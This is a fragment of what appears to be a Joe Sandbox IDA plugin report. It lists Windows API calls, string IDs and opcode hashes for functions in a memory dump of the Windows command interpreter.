                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            • API ID: CurrentFormatMessageThread
                                                                            • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                            • API String ID: 2411632146-3173542853
                                                                            • Opcode ID: e417b97f6ef77d0c42d02b888d741601b45a9f57d08cf0c1c5f402f5ad0fea51
                                                                            • Instruction ID: 1e17206e4c4457381462006afa9c2e1437c6b190b364975251ceb5e66acff634
                                                                            • Opcode Fuzzy Hash: e417b97f6ef77d0c42d02b888d741601b45a9f57d08cf0c1c5f402f5ad0fea51
                                                                            • Instruction Fuzzy Hash: AB51E271900324BADB345F29AC49E6BBAF8EF49B00F0045EDF549D25A1DA75EAC0CF21
                                                                            APIs
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00B1B7DB,0000000C,00000004,00000080,00000000), ref: 00B105FF
                                                                            • _open_osfhandle.MSVCRT ref: 00B10613
                                                                            • _wcsicmp.MSVCRT ref: 00B10663
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00B10695
                                                                            • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00B106D3
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00B106FB
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00B10717
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00B1E89D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                            • String ID: con
                                                                            • API String ID: 58404892-4257191772
                                                                            • Opcode ID: fa9f8468264a1db6128efb23952e90c773b37c8d07787549d31079229ffc565e
                                                                            • Instruction ID: b3baff7ad52911930c89a189d5ebecf71661fea5d82a91c8cb7fce97cfa64ecf
                                                                            • Opcode Fuzzy Hash: fa9f8468264a1db6128efb23952e90c773b37c8d07787549d31079229ffc565e
                                                                            • Instruction Fuzzy Hash: EA51EA70A50104ABDB10AF54DC85BEEB7F9FB55720FA04259F921E32D0DBB58EC18B61
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2C62E
                                                                            • memset.MSVCRT ref: 00B2C656
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C6C7
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00B2C6E6
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00B2C72A
                                                                            • _wcsicmp.MSVCRT ref: 00B2C747
                                                                            • _wcsicmp.MSVCRT ref: 00B2C76C
                                                                            • _wcsicmp.MSVCRT ref: 00B2C794
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C7B3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 00B2C7C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                            • String ID: CSVFS$NTFS$REFS
                                                                            • API String ID: 3510147486-2605508654
                                                                            • Opcode ID: 9c940697c285e6d980cabc7d475bd710a4865e55f67863114e44c5afacd759c7
                                                                            • Instruction ID: c6857d8171e115d23115b915856cd9b265c27170ea3d6998baa5ce518cd1af1d
                                                                            • Opcode Fuzzy Hash: 9c940697c285e6d980cabc7d475bd710a4865e55f67863114e44c5afacd759c7
                                                                            • Instruction Fuzzy Hash: C1514FB1A002296ADB20CA65EC89AEFBFF8EB55344F0400D9E509E3151EB34DE84CE65
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                            • API String ID: 2081463915-3124875276
                                                                            • Opcode ID: 7ca7c47d6f747e63fb40b176ab130c5bf702858115a57820b871f1ac80002679
                                                                            • Instruction ID: 4fae005a937915a0a7634b2f1552d2cf2c247d8e91c92858255f8f2fbd44533b
                                                                            • Opcode Fuzzy Hash: 7ca7c47d6f747e63fb40b176ab130c5bf702858115a57820b871f1ac80002679
                                                                            • Instruction Fuzzy Hash: 05412B31244302DAE7286B14E85977A3FE4FB537A4B2485EED102862D2EFB68844C312
                                                                            APIs
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00000000,?,00000001,?,?,?,00B15833,?, /D /c",?,?,?,00000000,?), ref: 00B21271
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: longjmp
                                                                            • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                            • API String ID: 1832741078-366822981
                                                                            • Opcode ID: 880ba6008eff2e1ddea057051d506b32689c1402a119c082009fcc7106cbd382
                                                                            • Instruction ID: 7e24ab7073dec571aaaa67bc64f2e0c971ccc7164c5e455d6c9bdaadf9a89035
                                                                            • Opcode Fuzzy Hash: 880ba6008eff2e1ddea057051d506b32689c1402a119c082009fcc7106cbd382
                                                                            • Instruction Fuzzy Hash: 13A1D270600628FBCF24DF58D58A9AE7BE6FBA4794B6084D5F40A476D0CB70DE91CB81
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00B40AF0,00002000,00000000,00000000,00000000,00000000), ref: 00B07ED4
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00B40AF0,00002000,?), ref: 00B07F16
                                                                            • _ultoa.MSVCRT ref: 00B1AFC9
                                                                            • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00B1AFDE
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00B1AFF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                            • String ID: Application$System
                                                                            • API String ID: 3538039442-3455788185
                                                                            • Opcode ID: de64376500716818c53203d4f6e7e22e7797ca71803182d03cd2b9aeb525bb55
                                                                            • Instruction ID: f464301be21419c78baf47f4669620ec2f34515e6f0dd23d9eefd237706a1bba
                                                                            • Opcode Fuzzy Hash: de64376500716818c53203d4f6e7e22e7797ca71803182d03cd2b9aeb525bb55
                                                                            • Instruction Fuzzy Hash: FD41EA71B813056BEB109B64CC89FAFBBEDEB46750F500069F606EB1C0DA70AE41C751
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcschr$_wcsicmpiswspace
                                                                            • String ID: :.\$=,;$=,;+/[] "
                                                                            • API String ID: 1913572127-843887632
                                                                            • Opcode ID: a090e09db789ed6e5a4560af5efc7c9f757a64ba3b909e8c481bc5fd457be915
                                                                            • Instruction ID: 4b01af54e6959d5fd4c92230c974cfc2be6027edd347dd33caa5ef46e26955b6
                                                                            • Opcode Fuzzy Hash: a090e09db789ed6e5a4560af5efc7c9f757a64ba3b909e8c481bc5fd457be915
                                                                            • Instruction Fuzzy Hash: 86A1C231A042149BDB24CB69D8C8BBA7BF0FF48314F5409E9E826A72D1DB70DE85CB51
                                                                            APIs
                                                                              • Part of subcall function 00B09E8E: iswspace.MSVCRT ref: 00B09E9E
                                                                            • wcsrchr.MSVCRT ref: 00B25406
                                                                            • wcschr.MSVCRT ref: 00B2541C
                                                                            • wcsrchr.MSVCRT ref: 00B2544C
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B2546B
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B2547B
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B25497
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B2549F
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B254B3
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B254D4
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00B25501
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B25557
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00B25578
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                            • String ID:
                                                                            • API String ID: 4166807220-0
                                                                            • Opcode ID: ed0e4eb515932302214a0e990928dc2da4a82b312d1508a27591d675dccf9317
                                                                            • Instruction ID: 64343d46341ebc70d433d1a3361bd598f6f33321a52a72c9db186b6e60a137c2
                                                                            • Opcode Fuzzy Hash: ed0e4eb515932302214a0e990928dc2da4a82b312d1508a27591d675dccf9317
                                                                            • Instruction Fuzzy Hash: E35185756002249ADB34AB34EC497E977E9FF11310F1484E9E49AD31D1EF709E85CB91
                                                                            APIs
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00B07669
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B07670
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00B07686
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B0768D
                                                                            • _wcsicmp.MSVCRT ref: 00B07719
                                                                            • _wcsicmp.MSVCRT ref: 00B0772B
                                                                            • _wcsicmp.MSVCRT ref: 00B07758
                                                                            • _wcsicmp.MSVCRT ref: 00B1AA79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heap_wcsicmp$AllocProcess
                                                                            • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                            • API String ID: 435930816-3086019870
                                                                            • Opcode ID: a416e8de661e37839010150d8bf36c623f237d8d83f6982403d089e252f489ac
                                                                            • Instruction ID: 26a492697d28f5e7257ca2cf51e4e7ba7e8f011f7ede20b12600c00d8021d4bb
                                                                            • Opcode Fuzzy Hash: a416e8de661e37839010150d8bf36c623f237d8d83f6982403d089e252f489ac
                                                                            • Instruction Fuzzy Hash: 68512635A49201AFE714DF38AC4596A7BD8FF05354B6484EDE942C72D2EF21EC01CB66
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2AF04
                                                                            • memset.MSVCRT ref: 00B2AF2E
                                                                            • memset.MSVCRT ref: 00B2AF58
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00B0250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00B2B08B
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00B2B095
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00B2B0AA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B1DA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B1F2
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00B2B20A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ErrorLast$InformationVolume
                                                                            • String ID: %04X-%04X
                                                                            • API String ID: 2748242238-1126166780
                                                                            • Opcode ID: bd1f0b67087983e8cd4c7de3549436cf7db82176e92336e36e323cd44a8c0ac0
                                                                            • Instruction ID: 9f02af4f7c18b1a99fd9bc779d2b159258f9b2cfb8f183e76bf623cfaf3fd16d
                                                                            • Opcode Fuzzy Hash: bd1f0b67087983e8cd4c7de3549436cf7db82176e92336e36e323cd44a8c0ac0
                                                                            • Instruction Fuzzy Hash: 3A91AEB1A002289BDB25DB24DC95EEBB7F8EF14304F4005E9E50DE3181EF349E848B95
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace
                                                                            • String ID: =,;
                                                                            • API String ID: 3458554142-1539845467
                                                                            • Opcode ID: c125865ccd515ad1e42f0cb5926586564d3e8c21aecb3c28763c0d0c8a818cee
                                                                            • Instruction ID: 4da21aba3ab1ee3818dcee4df0b90745a40a9882a87c3066e35c1eb8b1dfdcb5
                                                                            • Opcode Fuzzy Hash: c125865ccd515ad1e42f0cb5926586564d3e8c21aecb3c28763c0d0c8a818cee
                                                                            • Instruction Fuzzy Hash: 9F81BD749002168BEB349F64CC45BBABBF5EF10345F1448FAE94AA72C1EB748D84CB61
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B12431
                                                                            • memset.MSVCRT ref: 00B12452
                                                                            • memset.MSVCRT ref: 00B1247C
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00B0250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00B12585
                                                                            • _wcsicmp.MSVCRT ref: 00B125A3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B125CA
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B125E3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00B1F32B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$InformationVolume_wcsicmp
                                                                            • String ID: FAT
                                                                            • API String ID: 4247940253-238207945
                                                                            • Opcode ID: 5c93d7678e8eede4d5737dde644f7d25d576fcc5fa7f3eae365f8a424e094939
                                                                            • Instruction ID: 177f78c7b9692fff69e9da7bb0a90b98bc9af8d94d0ddfd28b6a8de1e147a07c
                                                                            • Opcode Fuzzy Hash: 5c93d7678e8eede4d5737dde644f7d25d576fcc5fa7f3eae365f8a424e094939
                                                                            • Instruction Fuzzy Hash: 8B516FB1900219ABEF24CB64DC99BEEB7F9EB54305F5400E9A505E3181EB349ED4CE25
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07381
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00B073D6
                                                                            • wcsncmp.MSVCRT ref: 00B073F9
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00B07465
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00B1A8C6
                                                                              • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
                                                                            • wcsstr.MSVCRT ref: 00B1A87E
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00B1A89B
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B1A8DE
                                                                              • Part of subcall function 00B1589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?), ref: 00B158BB
                                                                              • Part of subcall function 00B1589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B158CD
                                                                              • Part of subcall function 00B08B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00B299FD,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08B7B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                            • String ID: \\.\
                                                                            • API String ID: 799470305-2900601889
                                                                            • Opcode ID: da90e851ee97783e3d9765d4d955c7acfa6cb764bb5abbeb874ed9803a81492f
                                                                            • Instruction ID: 915a0f718077601b1d8c93e0b04bec675a6680aff4d5b03ffbbb396fa7735648
                                                                            • Opcode Fuzzy Hash: da90e851ee97783e3d9765d4d955c7acfa6cb764bb5abbeb874ed9803a81492f
                                                                            • Instruction Fuzzy Hash: 6751F375A483019BD7309B7198846AFBEE8EF85750F0008AAF859C33D1EF70E94586A3
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace$_wcsicmp
                                                                            • String ID: &<|>$+: $=,;
                                                                            • API String ID: 3089800946-2256444845
                                                                            • Opcode ID: 91e56b0faba759bb722e0a4b66086fc73c6f75e66e78f3e5a4cc902ab31dd038
                                                                            • Instruction ID: 68bbd9f9a9875847f6bb4215fbb5d46d2a3ecc61c1055417fa9bf89d01ab503d
                                                                            • Opcode Fuzzy Hash: 91e56b0faba759bb722e0a4b66086fc73c6f75e66e78f3e5a4cc902ab31dd038
                                                                            • Instruction Fuzzy Hash: 6B312931A0022447DB208F65AC497DE7FE5EF56705F1401E5EC09D32A2FB319E64CBAA
                                                                            APIs
                                                                              • Part of subcall function 00B2C0F8: free.MSVCRT ref: 00B2C116
                                                                              • Part of subcall function 00B2C0F8: free.MSVCRT ref: 00B2C123
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000,?,00000000), ref: 00B2BB97
                                                                            • qsort.MSVCRT ref: 00B2BC1A
                                                                            • wcschr.MSVCRT ref: 00B2BC6F
                                                                            • calloc.MSVCRT ref: 00B2BCB1
                                                                            • calloc.MSVCRT ref: 00B2BD82
                                                                            • wcschr.MSVCRT ref: 00B2BDCB
                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 00B2BE1D
                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 00B2BE3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
